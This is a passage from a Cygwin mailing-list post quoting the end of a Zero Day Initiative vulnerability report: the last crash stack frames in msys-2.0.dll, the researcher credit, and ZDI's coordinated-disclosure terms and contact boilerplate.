> 16      msys-2.0.dll    timegm + 0x4db  0x210193f2b     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 17      <unknown>       0x110000000     0x110000000
>
> ```
>
>
> -- CREDIT ---------------------------------------
> This vulnerability was discovered by:
> solid-snail working with Trend Micro Zero Day Initiative
>
> -- FURTHER DETAILS ------------------------------
>
> Supporting files:
>
>
> If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
>
> Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
>
> Zero Day Initiative
> zdi-disclosures AT trendmicro DOT com
>
> The PGP key used for all ZDI vendor communications is available from:
>
>    http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc
>
> -- INFORMATION ABOUT THE ZDI --------------------
> Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.
>
> Please contact us for further details or refer to:
>
>    http://www.zerodayinitiative.com
>
> -- DISCLOSURE POLICY ----------------------------
>
> Our vulnerability disclosure policy is available online at:
>
>    http://www.zerodayinitiative.com/advisories/disclosure_policy/
>
> TREND MICRO EMAIL NOTICE
>
> The information contained in this email and any attachments is confidential and may be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system.
>
> For details about what personal information we collect and why, please see our Privacy Notice on our website at: Read privacy policy<http://www.trendmicro.com/privacy>
>


-- 
Problem reports:      https://cygwin.com/problems.html
FAQ:                  https://cygwin.com/faq/
Documentation:        https://cygwin.com/docs.html
Unsubscribe info:     https://cygwin.com/ml/#unsubscribe-simple